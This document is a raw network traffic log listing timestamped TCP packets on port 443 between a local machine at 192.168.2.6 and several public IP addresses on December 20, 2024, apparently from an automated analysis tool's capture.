                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.327404022 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.327488899 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.328099966 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.328169107 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.328516960 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.328598976 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.358994961 CET49892443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375072956 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375086069 CET49893443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375098944 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375101089 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375102043 CET44349894172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375107050 CET44349896172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.375133038 CET44349895172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.424194098 CET49894443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.424199104 CET49896443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.424226999 CET49895443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.563491106 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.566143990 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.566169977 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.567137003 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.567188978 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.567706108 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.567773104 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.572968960 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.573064089 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.573168039 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.574805021 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.574841022 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.582048893 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.582084894 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.582186937 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.582712889 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.582730055 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.611285925 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.611305952 CET44349897172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.657311916 CET49897443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.903368950 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.903408051 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.903493881 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904081106 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904160976 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904246092 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904498100 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904515028 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904679060 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:41.904715061 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.454354048 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.454600096 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.454617023 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.456546068 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.456666946 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.458187103 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.458271027 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.492049932 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.492111921 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.492119074 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.492177963 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.493058920 CET49889443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.493094921 CET44349889116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.503331900 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.503348112 CET4434990823.44.201.16192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.549117088 CET49908443192.168.2.623.44.201.16
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.680275917 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.680385113 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.681034088 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.681335926 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.681370020 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.785432100 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.785645008 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.785666943 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.787097931 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.787170887 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.787477016 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.787568092 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.801856041 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.802310944 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.802324057 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.803345919 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.803417921 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.804662943 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.804727077 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.827737093 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.827768087 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.858196974 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.858206987 CET4434990920.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.873622894 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.904766083 CET49909443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.987334013 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.987421036 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.987937927 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.987956047 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.989726067 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.989742994 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.989830971 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.989851952 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.989860058 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.989869118 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990000010 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990027905 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990140915 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990165949 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990447998 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990468025 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990483999 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990489960 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990618944 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990662098 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990683079 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990696907 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990705967 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990714073 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990809917 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990838051 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990854979 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990865946 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990885019 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990897894 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990909100 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:42.990914106 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.118405104 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.118887901 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.118921995 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.119975090 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.120042086 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.121041059 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.121114969 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.173973083 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.174005032 CET4434991423.44.201.22192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.220176935 CET49914443192.168.2.623.44.201.22
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.271296024 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.271327972 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.271404982 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.271797895 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.271836042 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.273508072 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.274358988 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.274374962 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.275012970 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.275026083 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.323432922 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.323637962 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.323672056 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.325140953 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.325241089 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.326246977 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.326334000 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.379036903 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.379067898 CET44349915108.139.47.92192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:43.424998045 CET49915443192.168.2.6108.139.47.92
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.099594116 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.099656105 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.100959063 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.100975990 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103163004 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103169918 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103224993 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103240013 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103250027 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103255033 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103327036 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103339911 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103360891 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103368044 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103424072 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103437901 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103454113 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103461981 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103475094 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103482962 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103503942 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103513956 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103544950 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103555918 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103591919 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103604078 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103622913 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103634119 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103671074 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103682995 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103713989 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103725910 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103774071 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103785992 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103806019 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103816986 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103864908 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103876114 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103892088 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103899002 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103914976 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.103935003 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104026079 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104036093 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104048967 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104057074 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104101896 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104114056 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104156971 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104167938 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104239941 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104253054 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104274035 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104286909 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104296923 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104302883 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104326963 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104371071 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.104383945 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.151328087 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.487936020 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.488382101 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.488392115 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.488393068 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.488552094 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.488564014 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.488739967 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.489233017 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.489300013 CET44349924162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.489998102 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.490055084 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.490915060 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.491087914 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.534070015 CET49924443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.534200907 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.534210920 CET44349923162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:44.580576897 CET49923443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022042036 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022095919 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022108078 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022120953 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022166014 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022950888 CET49913443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.022958040 CET44349913116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.717514992 CET49938443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.717555046 CET44349938116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.717644930 CET49938443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.717889071 CET49938443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:45.717905045 CET44349938116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.249362946 CET49939443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.249399900 CET4434993923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.249454975 CET49939443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.249656916 CET49939443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.249670029 CET4434993923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279136896 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279208899 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279223919 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279336929 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.279490948 CET49911443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.280525923 CET49917443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.280546904 CET44349917116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.327331066 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.576611996 CET49942443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.576658010 CET4434994223.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.576771021 CET49942443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.577014923 CET49942443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.577028036 CET4434994223.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.599534035 CET4434991123.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:46.599662066 CET4434991123.209.72.43192.168.2.6
